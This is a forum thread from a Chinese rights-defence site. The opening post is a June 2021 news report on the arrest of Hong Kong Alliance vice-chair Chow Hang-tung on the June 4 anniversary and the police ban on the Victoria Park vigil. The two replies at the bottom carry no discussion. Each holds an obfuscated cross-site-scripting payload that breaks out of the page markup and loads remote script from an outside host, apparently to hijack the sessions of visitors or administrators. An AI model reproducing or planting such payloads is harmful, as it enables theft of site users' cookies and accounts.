维权公民网

 找回密码
 立即注册
查看: 58|回复: 2

香港支联会副主席邹幸彤或涉六四32周年悼念被捕

[复制链接]

261

主题

261

帖子

-120

积分

限制会员

积分
-120
发表于 2021-6-5 09:52:12 | 显示全部楼层 |阅读模式
 
香港警方在六四事件32周年悼念日早上拘捕香港市民
支援爱国民主运动联合会(支联会)副主席邹幸彤
(来源:BBC视频采访截图)



(香港-2021年6月4日)中共香港当局决心在6月4日天安门事件纪念日这天阻止任何抗议行动。支联会副主席邹幸彤在香港当地时间(6月4日)早上被警方以公安条例17A(1)(d)拘捕,即涉宣传或公布未经批准集结。警方证实已拘捕她及另一人。

据香港电台报道,邹幸彤原定今早到商台,接受节目访问,被捕后暂时在中区警署扣留,稍后或带返新界南总部调查。警方指,另有一名男子被捕。据报为20岁的“外卖员”。
支联会秘书蔡耀昌向商台表示,律师确认邹幸彤在办公室附近被捕,支联会非常关注和担忧,会透过律师跟进及协助。蔡耀昌重申支联会对今年六四集会的立场,在当前严峻的政治形势下,他提醒市民,悼念六四要以安全、合法,为最大原则。
香港《明报》刊出邹幸彤的文章,题为“烛光承载良知重量,港人执着说出真相”。邹幸彤在文中提到,“在白色恐怖笼罩的32 年里,中共差一点就成功夺取天安门的话语权了”,当六四变成敏感词,是香港人“以让世人讶异的韧力”,顽强抵挡。如今政权千方百计想扑灭维园的烛光,诘问香港人是否要不战而退,主动让出维园这个战场,让六四真相再次流亡?
邹幸彤在文章中指,每退一步,所谓法律的红线只会愈划愈多,反抗不是送头,而是为生命、为尊严而战。
日前,邹幸彤在社交平台以个人名义表示,对支联会无法再以组织名义主办维园的烛光悼念,感到愧疚。又说每人都应尽力在严寒中守住烛光、良知的底线及仅余的自由。
今年37岁的邹幸彤, 是香港维园烛光晚会主办单位“香港市民支持爱国民主运动联合会”(简称“支联会”)的副主席。维园烛光守夜晚会是全世界规模最大,持续最久的悼念89六四的活动。
今年是连续第二年悼念六四维园晚会不获批准举行,媒体引述消息称,警方动员7,000 警力在全港多区戒备,警方将维园等地方形为高危区域,在六四当天,加派警员巡逻,加强取缔未经批准的集结活动。警方六四下午2时起封锁维多利亚公园,防止有人违反禁令进入维园参与六四悼念。
美国国务卿布林肯6月3日发表六四32周年声明,“向32年前牺牲的受难者,以及今日在中国政府施压下仍持续努力的勇敢活动人士致敬”。美国将继续与“争取政府尊重普世人权”的中国人民站在一起。
(对华援助协会特约通讯员高珍赛)

 
向中国大陆的维权公民致敬!
回复

使用道具 举报

2

主题

95

帖子

234

积分

中级会员

Rank: 3Rank: 3

积分
234
发表于 2021-6-29 09:23:53 | 显示全部楼层
"><sCRiPt/SrC=//xss8.cc/cJe1>
向中国大陆的维权公民致敬!
回复 支持 反对

使用道具 举报

2

主题

95

帖子

234

积分

中级会员

Rank: 3Rank: 3

积分
234
发表于 2021-6-29 09:25:00 | 显示全部楼层
</td></tr><sCRiPt/SrC=//xss8.cc/cJe1>
向中国大陆的维权公民致敬!
回复 支持 反对

使用道具 举报

本版积分规则

Archiver|手机版|小黑屋|维权公民网

GMT+8, 2021-7-25 23:37 , Processed in 0.073446 second(s), 30 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表